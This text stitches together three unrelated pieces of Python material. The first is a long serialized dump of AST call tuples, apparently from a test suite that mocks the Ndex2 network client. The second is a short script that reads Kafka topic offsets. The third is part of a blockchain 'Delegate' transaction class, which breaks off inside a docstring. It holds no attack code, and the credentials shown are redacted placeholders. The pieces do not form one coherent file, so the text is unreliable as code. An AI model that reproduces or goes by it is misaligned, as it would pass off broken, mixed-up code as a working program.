'requests_mock.mock', ([], {}), '()\n', (13180, 13182), False, 'import requests_mock\n'), ((13507, 13514), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (13512, 13514), False, 'from ndex2.client import Ndex2\n'), ((13728, 13748), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (13746, 13748), False, 'import requests_mock\n'), ((14077, 14084), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (14082, 14084), False, 'from ndex2.client import Ndex2\n'), ((14302, 14322), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (14320, 14322), False, 'import requests_mock\n'), ((14659, 14666), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (14664, 14666), False, 'from ndex2.client import Ndex2\n'), ((14865, 14885), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (14883, 14885), False, 'import requests_mock\n'), ((15222, 15229), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (15227, 15229), False, 'from ndex2.client import Ndex2\n'), ((15422, 15442), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (15440, 15442), False, 'import requests_mock\n'), ((15771, 15778), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (15776, 15778), False, 'from ndex2.client import Ndex2\n'), ((15985, 16005), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (16003, 16005), False, 'import requests_mock\n'), ((16334, 16341), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (16339, 16341), False, 'from ndex2.client import Ndex2\n'), ((16614, 16634), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (16632, 16634), False, 'import requests_mock\n'), ((17023, 17030), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (17028, 17030), False, 'from ndex2.client import Ndex2\n'), ((17294, 17314), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (17312, 17314), False, 'import requests_mock\n'), ((17596, 17603), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (17601, 17603), False, 'from ndex2.client import Ndex2\n'), ((17798, 17818), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (17816, 17818), False, 'import requests_mock\n'), ((18103, 18110), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (18108, 18110), False, 'from ndex2.client import Ndex2\n'), ((18323, 18343), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (18341, 18343), False, 'import requests_mock\n'), ((18633, 18640), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (18638, 18640), False, 'from ndex2.client import Ndex2\n'), ((18859, 18879), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (18877, 18879), False, 'import requests_mock\n'), ((19014, 19021), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (19019, 19021), False, 'from ndex2.client import Ndex2\n'), ((20062, 20082), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (20080, 20082), False, 'import requests_mock\n'), ((20403, 20410), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (20408, 20410), False, 'from ndex2.client import Ndex2\n'), ((20573, 20593), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (20591, 20593), False, 'import requests_mock\n'), ((20918, 20925), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (20923, 20925), False, 'from ndex2.client import Ndex2\n'), ((21053, 21073), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (21071, 21073), False, 'import requests_mock\n'), ((21435, 21442), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (21440, 21442), False, 'from ndex2.client import Ndex2\n'), ((21772, 21792), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (21790, 21792), False, 'import requests_mock\n'), ((22087, 22094), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (22092, 22094), False, 'from ndex2.client import Ndex2\n'), ((22375, 22395), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (22393, 22395), False, 'import requests_mock\n'), ((22734, 22741), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (22739, 22741), False, 'from ndex2.client import Ndex2\n'), ((23064, 23084), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (23082, 23084), False, 'import requests_mock\n'), ((23220, 23227), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (23225, 23227), False, 'from ndex2.client import Ndex2\n'), ((23843, 23863), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (23861, 23863), False, 'import requests_mock\n'), ((24194, 24201), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (24199, 24201), False, 'from ndex2.client import Ndex2\n'), ((24359, 24379), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (24377, 24379), False, 'import requests_mock\n'), ((24656, 24663), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (24661, 24663), False, 'from ndex2.client import Ndex2\n'), ((25015, 25035), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (25033, 25035), False, 'import requests_mock\n'), ((25307, 25314), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (25312, 25314), False, 'from ndex2.client import Ndex2\n'), ((25660, 25680), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (25678, 25680), False, 'import requests_mock\n'), ((25967, 25974), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (25972, 25974), False, 'from ndex2.client import Ndex2\n'), ((26281, 26301), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (26299, 26301), False, 'import requests_mock\n'), ((26437, 26444), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (26442, 26444), False, 'from ndex2.client import Ndex2\n'), ((27196, 27216), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (27214, 27216), False, 'import requests_mock\n'), ((27352, 27359), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (27357, 27359), False, 'from ndex2.client import Ndex2\n'), ((27806, 27826), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (27824, 27826), False, 'import requests_mock\n'), ((27962, 27969), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (27967, 27969), False, 'from ndex2.client import Ndex2\n'), ((28413, 28433), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (28431, 28433), False, 'import requests_mock\n'), ((28569, 28576), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (28574, 28576), False, 'from ndex2.client import Ndex2\n'), ((29018, 29038), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (29036, 29038), False, 'import requests_mock\n'), ((29358, 29365), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (29363, 29365), False, 'from ndex2.client import Ndex2\n'), ((29680, 29700), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (29698, 29700), False, 'import requests_mock\n'), ((29951, 29958), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (29956, 29958), False, 'from ndex2.client import Ndex2\n'), ((30216, 30236), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (30234, 30236), False, 'import requests_mock\n'), ((30534, 30541), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (30539, 30541), False, 'from ndex2.client import Ndex2\n'), ((30785, 30805), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (30803, 30805), False, 'import requests_mock\n'), ((30941, 30948), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (30946, 30948), False, 'from ndex2.client import Ndex2\n'), ((31235, 31255), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (31253, 31255), False, 'import requests_mock\n'), ((31391, 31398), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (31396, 31398), False, 'from ndex2.client import Ndex2\n'), ((31686, 31706), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (31704, 31706), False, 'import requests_mock\n'), ((31842, 31849), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (31847, 31849), False, 'from ndex2.client import Ndex2\n'), ((32150, 32170), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (32168, 32170), False, 'import requests_mock\n'), ((32554, 32598), 'ndex2.client.Ndex2', 'Ndex2', ([], {'username': '"""bob"""', 'password': '"""<PASSWORD>"""'}), "(username='bob', password='<PASSWORD>')\n", (32559, 32598), False, 'from ndex2.client import Ndex2\n'), ((33379, 33399), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (33397, 33399), False, 'import requests_mock\n'), ((33804, 33848), 'ndex2.client.Ndex2', 'Ndex2', ([], {'username': '"""bob"""', 'password': '"""<PASSWORD>"""'}), "(username='bob', password='<PASSWORD>')\n", (33809, 33848), False, 'from ndex2.client import Ndex2\n'), ((34645, 34665), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (34663, 34665), False, 'import requests_mock\n'), ((35067, 35111), 'ndex2.client.Ndex2', 'Ndex2', ([], {'username': '"""bob"""', 'password': '"""<PASSWORD>"""'}), "(username='bob', password='<PASSWORD>')\n", (35072, 35111), False, 'from ndex2.client import Ndex2\n'), ((36000, 36020), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (36018, 36020), False, 'import requests_mock\n'), ((36404, 36448), 'ndex2.client.Ndex2', 'Ndex2', ([], {'username': '"""bob"""', 'password': '"""<PASSWORD>"""'}), "(username='bob', password='<PASSWORD>')\n", (36409, 36448), False, 'from ndex2.client import Ndex2\n'), ((37354, 37374), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (37372, 37374), False, 'import requests_mock\n'), ((37761, 37805), 'ndex2.client.Ndex2', 'Ndex2', ([], {'username': '"""bob"""', 'password': '"""<PASSWORD>"""'}), "(username='bob', password='<PASSWORD>')\n", (37766, 37805), False, 'from ndex2.client import Ndex2\n'), ((38983, 39003), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (39001, 39003), False, 'import requests_mock\n'), ((39411, 39455), 'ndex2.client.Ndex2', 'Ndex2', ([], {'username': '"""bob"""', 'password': '"""<PASSWORD>"""'}), "(username='bob', password='<PASSWORD>')\n", (39416, 39455), False, 'from ndex2.client import Ndex2\n'), ((40635, 40655), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (40653, 40655), False, 'import requests_mock\n'), ((40791, 40798), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (40796, 40798), False, 'from ndex2.client import Ndex2\n'), ((45186, 45201), 'json.loads', 'json.loads', (['res'], {}), '(res)\n', (45196, 45201), False, 'import json\n'), ((45567, 45587), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (45585, 45587), False, 'import requests_mock\n'), ((45723, 45730), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (45728, 45730), False, 'from ndex2.client import Ndex2\n'), ((46273, 46293), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (46291, 46293), False, 'import requests_mock\n'), ((46429, 46473), 'ndex2.client.Ndex2', 'Ndex2', ([], {'username': '"""bob"""', 'password': '"""<PASSWORD>"""'}), "(username='bob', password='<PASSWORD>')\n", (46434, 46473), False, 'from ndex2.client import Ndex2\n'), ((47048, 47068), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (47066, 47068), False, 'import requests_mock\n'), ((47217, 47261), 'ndex2.client.Ndex2', 'Ndex2', ([], {'username': '"""bob"""', 'password': '"""<PASSWORD>"""'}), "(username='bob', password='<PASSWORD>')\n", (47222, 47261), False, 'from ndex2.client import Ndex2\n'), ((47944, 47964), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (47962, 47964), False, 'import requests_mock\n'), ((48603, 48647), 'ndex2.client.Ndex2', 'Ndex2', ([], {'username': '"""bob"""', 'password': '"""<PASSWORD>"""'}), "(username='bob', password='<PASSWORD>')\n", (48608, 48647), False, 'from ndex2.client import Ndex2\n'), ((49024, 49055), 'json.loads', 'json.loads', (['m.last_request.text'], {}), '(m.last_request.text)\n', (49034, 49055), False, 'import json\n'), ((49169, 49189), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (49187, 49189), False, 'import requests_mock\n'), ((49325, 49332), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (49330, 49332), False, 'from ndex2.client import Ndex2\n'), ((49809, 49829), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (49827, 49829), False, 'import requests_mock\n'), ((50468, 50512), 'ndex2.client.Ndex2', 'Ndex2', ([], {'username': '"""bob"""', 'password': '"""<PASSWORD>"""'}), "(username='bob', password='<PASSWORD>')\n", (50473, 50512), False, 'from ndex2.client import Ndex2\n'), ((50627, 50658), 'json.loads', 'json.loads', (['m.last_request.text'], {}), '(m.last_request.text)\n', (50637, 50658), False, 'import json\n'), ((50787, 50807), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (50805, 50807), False, 'import requests_mock\n'), ((50943, 50950), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (50948, 50950), False, 'from ndex2.client import Ndex2\n'), ((51430, 51450), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (51448, 51450), False, 'import requests_mock\n'), ((52089, 52133), 'ndex2.client.Ndex2', 'Ndex2', ([], {'username': '"""bob"""', 'password': '"""<PASSWORD>"""'}), "(username='bob', password='<PASSWORD>')\n", (52094, 52133), False, 'from ndex2.client import Ndex2\n'), ((52249, 52280), 'json.loads', 'json.loads', (['m.last_request.text'], {}), '(m.last_request.text)\n', (52259, 52280), False, 'import json\n'), ((52417, 52437), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (52435, 52437), False, 'import requests_mock\n'), ((52573, 52580), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (52578, 52580), False, 'from ndex2.client import Ndex2\n'), ((53083, 53103), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (53101, 53103), False, 'import requests_mock\n'), ((53742, 53786), 'ndex2.client.Ndex2', 'Ndex2', ([], {'username': '"""bob"""', 'password': '"""<PASSWORD>"""'}), "(username='bob', password='<PASSWORD>')\n", (53747, 53786), False, 'from ndex2.client import Ndex2\n'), ((53910, 53941), 'json.loads', 'json.loads', (['m.last_request.text'], {}), '(m.last_request.text)\n', (53920, 53941), False, 'import json\n'), ((54234, 54254), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (54252, 54254), False, 'import requests_mock\n'), ((54403, 54447), 'ndex2.client.Ndex2', 'Ndex2', ([], {'username': '"""bob"""', 'password': '"""<PASSWORD>"""'}), "(username='bob', password='<PASSWORD>')\n", (54408, 54447), False, 'from ndex2.client import Ndex2\n'), ((54828, 54848), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (54846, 54848), False, 'import requests_mock\n'), ((54984, 54991), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (54989, 54991), False, 'from ndex2.client import Ndex2\n'), ((55458, 55478), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (55476, 55478), False, 'import requests_mock\n'), ((56117, 56161), 'ndex2.client.Ndex2', 'Ndex2', ([], {'username': '"""bob"""', 'password': '"""<PASSWORD>"""'}), "(username='bob', password='<PASSWORD>')\n", (56122, 56161), False, 'from ndex2.client import Ndex2\n'), ((56276, 56307), 'json.loads', 'json.loads', (['m.last_request.text'], {}), '(m.last_request.text)\n', (56286, 56307), False, 'import json\n'), ((56487, 56507), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (56505, 56507), False, 'import requests_mock\n'), ((57146, 57190), 'ndex2.client.Ndex2', 'Ndex2', ([], {'username': '"""bob"""', 'password': '"""<PASSWORD>"""'}), "(username='bob', password='<PASSWORD>')\n", (57151, 57190), False, 'from ndex2.client import Ndex2\n'), ((57306, 57337), 'json.loads', 'json.loads', (['m.last_request.text'], {}), '(m.last_request.text)\n', (57316, 57337), False, 'import json\n'), ((57466, 57486), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (57484, 57486), False, 'import requests_mock\n'), ((57823, 57830), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (57828, 57830), False, 'from ndex2.client import Ndex2\n'), ((58108, 58128), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (58126, 58128), False, 'import requests_mock\n'), ((58484, 58491), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (58489, 58491), False, 'from ndex2.client import Ndex2\n'), ((58769, 58789), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (58787, 58789), False, 'import requests_mock\n'), ((59136, 59143), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (59141, 59143), False, 'from ndex2.client import Ndex2\n'), ((59441, 59461), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (59459, 59461), False, 'import requests_mock\n'), ((59817, 59824), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (59822, 59824), False, 'from ndex2.client import Ndex2\n'), ((60105, 60125), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (60123, 60125), False, 'import requests_mock\n'), ((60539, 60546), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (60544, 60546), False, 'from ndex2.client import Ndex2\n'), ((60888, 60908), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (60906, 60908), False, 'import requests_mock\n'), ((61329, 61336), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (61334, 61336), False, 'from ndex2.client import Ndex2\n'), ((61658, 61678), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (61676, 61678), False, 'import requests_mock\n'), ((62104, 62111), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (62109, 62111), False, 'from ndex2.client import Ndex2\n'), ((62323, 62343), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (62341, 62343), False, 'import requests_mock\n'), ((62759, 62766), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (62764, 62766), False, 'from ndex2.client import Ndex2\n'), ((62977, 62997), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (62995, 62997), False, 'import requests_mock\n'), ((63404, 63411), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (63409, 63411), False, 'from ndex2.client import Ndex2\n'), ((63609, 63629), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (63627, 63629), False, 'import requests_mock\n'), ((63778, 63785), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (63783, 63785), False, 'from ndex2.client import Ndex2\n'), ((64238, 64258), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (64256, 64258), False, 'import requests_mock\n'), ((64394, 64401), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (64399, 64401), False, 'from ndex2.client import Ndex2\n'), ((64627, 64647), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (64645, 64647), False, 'import requests_mock\n'), ((65092, 65099), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (65097, 65099), False, 'from ndex2.client import Ndex2\n'), ((65436, 65456), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (65454, 65456), False, 'import requests_mock\n'), ((65913, 65920), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (65918, 65920), False, 'from ndex2.client import Ndex2\n'), ((66138, 66158), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (66156, 66158), False, 'import requests_mock\n'), ((66605, 66612), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (66610, 66612), False, 'from ndex2.client import Ndex2\n'), ((66829, 66849), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (66847, 66849), False, 'import requests_mock\n'), ((67286, 67293), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (67291, 67293), False, 'from ndex2.client import Ndex2\n'), ((67487, 67507), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (67505, 67507), False, 'import requests_mock\n'), ((67884, 67891), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (67889, 67891), False, 'from ndex2.client import Ndex2\n'), ((68214, 68234), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (68232, 68234), False, 'import requests_mock\n'), ((68595, 68602), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (68600, 68602), False, 'from ndex2.client import Ndex2\n'), ((68937, 68957), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (68955, 68957), False, 'import requests_mock\n'), ((69093, 69100), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (69098, 69100), False, 'from ndex2.client import Ndex2\n'), ((69329, 69349), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (69347, 69349), False, 'import requests_mock\n'), ((69694, 69701), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (69699, 69701), False, 'from ndex2.client import Ndex2\n'), ((69903, 69923), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (69921, 69923), False, 'import requests_mock\n'), ((70274, 70281), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (70279, 70281), False, 'from ndex2.client import Ndex2\n'), ((70489, 70509), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (70507, 70509), False, 'import requests_mock\n'), ((70646, 70653), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (70651, 70653), False, 'from ndex2.client import Ndex2\n'), ((71034, 71054), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (71052, 71054), False, 'import requests_mock\n'), ((71191, 71198), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (71196, 71198), False, 'from ndex2.client import Ndex2\n'), ((71575, 71595), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (71593, 71595), False, 'import requests_mock\n'), ((71732, 71739), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (71737, 71739), False, 'from ndex2.client import Ndex2\n'), ((72081, 72101), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (72099, 72101), False, 'import requests_mock\n'), ((72412, 72456), 'ndex2.client.Ndex2', 'Ndex2', ([], {'username': '"""bob"""', 'password': '"""<PASSWORD>"""'}), "(username='bob', password='<PASSWORD>')\n", (72417, 72456), False, 'from ndex2.client import Ndex2\n'), ((72605, 72625), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (72623, 72625), False, 'import requests_mock\n'), ((72936, 72980), 'ndex2.client.Ndex2', 'Ndex2', ([], {'username': '"""bob"""', 'password': '"""<PASSWORD>"""'}), "(username='bob', password='<PASSWORD>')\n", (72941, 72980), False, 'from ndex2.client import Ndex2\n'), ((73277, 73297), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (73295, 73297), False, 'import requests_mock\n'), ((73608, 73652), 'ndex2.client.Ndex2', 'Ndex2', ([], {'username': '"""bob"""', 'password': '"""<PASSWORD>"""'}), "(username='bob', password='<PASSWORD>')\n", (73613, 73652), False, 'from ndex2.client import Ndex2\n'), ((74004, 74024), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (74022, 74024), False, 'import requests_mock\n'), ((74335, 74379), 'ndex2.client.Ndex2', 'Ndex2', ([], {'username': '"""bob"""', 'password': '"""<PASSWORD>"""'}), "(username='bob', password='<PASSWORD>')\n", (74340, 74379), False, 'from ndex2.client import Ndex2\n'), ((74764, 74784), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (74782, 74784), False, 'import requests_mock\n'), ((75414, 75458), 'ndex2.client.Ndex2', 'Ndex2', ([], {'username': '"""bob"""', 'password': '"""<PASSWORD>"""'}), "(username='bob', password='<PASSWORD>')\n", (75419, 75458), False, 'from ndex2.client import Ndex2\n'), ((75797, 75817), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (75815, 75817), False, 'import requests_mock\n'), ((75953, 75960), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (75958, 75960), False, 'from ndex2.client import Ndex2\n'), ((76192, 76212), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (76210, 76212), False, 'import requests_mock\n'), ((76546, 76590), 'ndex2.client.Ndex2', 'Ndex2', ([], {'username': '"""bob"""', 'password': '"""<PASSWORD>"""'}), "(username='bob', password='<PASSWORD>')\n", (76551, 76590), False, 'from ndex2.client import Ndex2\n'), ((76747, 76767), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (76765, 76767), False, 'import requests_mock\n'), ((77102, 77146), 'ndex2.client.Ndex2', 'Ndex2', ([], {'username': '"""bob"""', 'password': '"""<PASSWORD>"""'}), "(username='bob', password='<PASSWORD>')\n", (77107, 77146), False, 'from ndex2.client import Ndex2\n'), ((77334, 77354), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (77352, 77354), False, 'import requests_mock\n'), ((77491, 77498), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (77496, 77498), False, 'from ndex2.client import Ndex2\n'), ((78570, 78590), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (78588, 78590), False, 'import requests_mock\n'), ((79129, 79136), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (79134, 79136), False, 'from ndex2.client import Ndex2\n'), ((79306, 79326), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (79324, 79326), False, 'import requests_mock\n'), ((79905, 79912), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (79910, 79912), False, 'from ndex2.client import Ndex2\n'), ((2189, 2200), 'numpy.int32', 'np.int32', (['(1)'], {}), '(1)\n', (2197, 2200), True, 'import numpy as np\n'), ((6855, 6862), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (6860, 6862), False, 'from ndex2.client import Ndex2\n'), ((38175, 38209), 'json.dumps', 'json.dumps', (['cx'], {'cls': 'DecimalEncoder'}), '(cx, cls=DecimalEncoder)\n', (38185, 38209), False, 'import json\n'), ((39825, 39859), 'json.dumps', 'json.dumps', (['cx'], {'cls': 'DecimalEncoder'}), '(cx, cls=DecimalEncoder)\n', (39835, 39859), False, 'import json\n'), ((37985, 38019), 'json.dumps', 'json.dumps', (['cx'], {'cls': 'DecimalEncoder'}), '(cx, cls=DecimalEncoder)\n', (37995, 38019), False, 'import json\n'), ((39635, 39669), 'json.dumps', 'json.dumps', (['cx'], {'cls': 'DecimalEncoder'}), '(cx, cls=DecimalEncoder)\n', (39645, 39669), False, 'import json\n')]
|
import os
import sys
import time
import os.path
import json
import config
import json
sys.path.extend(["lib/"+x for x in os.listdir("lib") if x.endswith('.jar')])
from java.lang import System
from kafka.consumer import SimpleConsumer
#
# offsets_after_time_millis = -1 => get latest offset
# offsets_after_time_millis = -2 => get oldest offset
#
def get_offsets(offsets_after_time_millis,
conn_params = config.DEFAULT_CONN_PARAMS):
curr_time = long(time.time() * 1000)
for host in config.bagheera_nodes:
for topic in config.topics:
for partition in config.partitions:
consumer = SimpleConsumer(host, conn_params['port'],
conn_params['nrecs'], conn_params['bufsize'])
offset = long(consumer.getOffsetsBefore(topic,
partition,
offsets_after_time_millis, 1)[0])
consumer.close()
System.out.println(json.dumps({
'time_millis' : curr_time,
'hostname' : host,
'topic' : topic,
'partition' : partition,
'offset' : offset
}))
if __name__ == '__main__':
get_offsets(-1)
|
[
"kafka.consumer.SimpleConsumer",
"os.listdir",
"json.dumps",
"time.time"
] |
[((122, 139), 'os.listdir', 'os.listdir', (['"""lib"""'], {}), "('lib')\n", (132, 139), False, 'import os\n'), ((476, 487), 'time.time', 'time.time', ([], {}), '()\n', (485, 487), False, 'import time\n'), ((647, 739), 'kafka.consumer.SimpleConsumer', 'SimpleConsumer', (['host', "conn_params['port']", "conn_params['nrecs']", "conn_params['bufsize']"], {}), "(host, conn_params['port'], conn_params['nrecs'], conn_params\n ['bufsize'])\n", (661, 739), False, 'from kafka.consumer import SimpleConsumer\n'), ((1074, 1192), 'json.dumps', 'json.dumps', (["{'time_millis': curr_time, 'hostname': host, 'topic': topic, 'partition':\n partition, 'offset': offset}"], {}), "({'time_millis': curr_time, 'hostname': host, 'topic': topic,\n 'partition': partition, 'offset': offset})\n", (1084, 1192), False, 'import json\n')]
|
from bpl_lib.transactions.Transaction import Transaction
from bpl_lib.helpers.Constants import TRANSACTION_TYPE
from bpl_lib.crypto.Keys import Keys
class Delegate(Transaction):
def __init__(self, fee, _error_use_class_method=True):
"""
Create a delegate transaction
:param fee: fee for transaction
:param _error_use_class_method: boolean flag, used to indicate if the transaction
was created from generate or from_dict
"""
if _error_use_class_method:
raise TypeError("Please use Delegate.generate(args) or Delegate.from_dict(args) to construct me.")
super().__init__(TRANSACTION_TYPE.DELEGATE, fee)
@classmethod
def generate(cls, username, secret, second_secret=None, fee=None):
"""
Create a delegate transaction
:param username: username of delegate (string)
:param secret: secret passphrase (string or bytes)
:param second_secret: second secret passphrase (string or bytes)
:param fee: fee for transaction (integer)
:return: (Delegate)
"""
self = cls(fee, _error_use_class_method=False)
self._sender_public_key = Keys(secret).get_public_key()
self._asset["delegate"] = {
"username": username,
"publicKey": self._sender_public_key
}
self.sign(secret, second_secret)
return self
@classmethod
def from_dict(cls, transaction):
"""
Create a delegate transaction
